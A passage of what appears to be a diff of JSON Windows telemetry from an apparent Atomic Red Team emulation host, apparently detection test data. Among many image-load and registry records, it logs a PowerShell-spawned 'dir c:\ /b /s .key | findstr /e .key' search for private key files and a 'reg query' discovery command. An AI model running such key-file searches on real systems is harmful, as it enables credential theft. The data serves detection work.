- "event_type": "file", - "file_name": "cert.key", - "file_path": "C:\\Windows\\cert.key", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\WINDOWS\\system32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "event_type": "process", - "pid": 3668, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A6C14E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"dir c:\\ /b /s .key | findstr /e .key\"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 7132, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571014100000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": 
"C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014020000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "command_line": "C:\\WINDOWS\\system32\\cmd.exe /S /D /c\" dir c:\\ /b /s .key \"", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "ppid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}", - "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": 
"image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "command_line": "findstr /e .key", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "cmd.exe", - "parent_process_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 1376, - "ppid": 7132, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "create", - "timestamp": 131883571014230000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}", - "unique_ppid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": 
"C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", - "registry_value": "Software Publishing", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": 
"image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "user32.dll", - "image_path": "C:\\Windows\\System32\\user32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "win32u.dll", - "image_path": "C:\\Windows\\System32\\win32u.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32.dll", - "image_path": "C:\\Windows\\System32\\gdi32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "gdi32full.dll", - "image_path": "C:\\Windows\\System32\\gdi32full.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "msvcp_win.dll", - "image_path": "C:\\Windows\\System32\\msvcp_win.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "ucrtbase.dll", - "image_path": 
"C:\\Windows\\System32\\ucrtbase.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - 
"pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": 
"HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - 
"registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": 
"{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_value": "Disallowed", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\Certificates", - "registry_value": "Certificates", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CRLs", - "registry_value": "CRLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "registry", - "pid": 2376, - "process_name": "Sysmon.exe", - "process_path": "C:\\WINDOWS\\Sysmon.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed", - "registry_path": 
"HKLM\\SOFTWARE\\Microsoft\\EnterpriseCertificates\\Disallowed\\CTLs", - "registry_value": "CTLs", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" - }, - { - "event_type": "image_load", - "image_name": "imm32.dll", - "image_path": "C:\\Windows\\System32\\imm32.dll", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014330000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "image_load", - "image_name": "findstr.exe", - "image_path": "C:\\Windows\\System32\\findstr.exe", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "timestamp": 131883571014180000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "file", - "file_name": "SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", - "file_path": "C:\\Windows\\Prefetch\\SEARCHPROTOCOLHOST.EXE-AFAD3EF9.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571016990000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "SEARCHFILTERHOST.EXE-AA7A1FDD.pf", - "file_path": "C:\\Windows\\Prefetch\\SEARCHFILTERHOST.EXE-AA7A1FDD.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571017150000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "file", - "file_name": "FINDSTR.EXE-4176B665.pf", - "file_path": "C:\\Windows\\Prefetch\\FINDSTR.EXE-4176B665.pf", - "pid": 1692, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "timestamp": 131883571115420000, - "unique_pid": "{42FC7E13-B2A2-5C05-0000-00102F790100}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program 
Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2688, - "process_name": "vmtoolsd.exe", - "process_path": "C:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe", - "registry_key": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip", - "registry_path": "HKLM\\System\\CurrentControlSet\\Services\\Tcpip\\Parameters", - "registry_value": "Parameters", - "timestamp": 131883571148710000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010F8050200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_value": "VFUProvider", - "timestamp": 131883571200110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "registry", - "pid": 2712, - "process_name": "svchost.exe", - "process_path": "c:\\windows\\system32\\svchost.exe", - "registry_key": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider", - "registry_path": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\VFUProvider\\StartTime", - "registry_value": "StartTime", - "timestamp": 
131883571200110000, - "unique_pid": "{42FC7E13-B2AE-5C05-0000-0010A4060200}" - }, - { - "event_type": "process", - "pid": 5508, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010A7C34E01}" - }, - { - "event_type": "process", - "pid": 1376, - "process_name": "findstr.exe", - "process_path": "C:\\Windows\\System32\\findstr.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-00102CC44E01}" - }, - { - "event_type": "process", - "pid": 7132, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308240000, - "unique_pid": "{42FC7E13-CAED-5C05-0000-0010B4C24E01}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 3880, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571308400000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": "image_load", - "image_name": "cmd.exe", - "image_path": "C:\\Windows\\System32\\cmd.exe", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "ntdll.dll", - "image_path": "C:\\Windows\\System32\\ntdll.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 
131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "kernel32.dll", - "image_path": "C:\\Windows\\System32\\kernel32.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "KernelBase.dll", - "image_path": "C:\\Windows\\System32\\KernelBase.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "image_load", - "image_name": "msvcrt.dll", - "image_path": "C:\\Windows\\System32\\msvcrt.dll", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "event_type": "process", - "pid": 3880, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "terminate", - "timestamp": 131883571308390000, - "unique_pid": "{42FC7E13-CB0A-5C05-0000-00100E955001}" - }, - { - "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c \"reg query \" HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows", - "event_type": "process", - "logon_id": 217055, - "parent_process_name": "powershell.exe", - "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", - "pid": 4708, - "ppid": 7036, - "process_name": "cmd.exe", - "process_path": "C:\\Windows\\System32\\cmd.exe", - "subtype": "create", - "timestamp": 131883571310950000, - "unique_pid": "{42FC7E13-CB0B-5C05-0000-0010D0A65001}", - "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", - "user": "ART-DESKTOP\\bob", - "user_domain": "ART-DESKTOP", - "user_name": "bob" - }, - { - "event_type": 
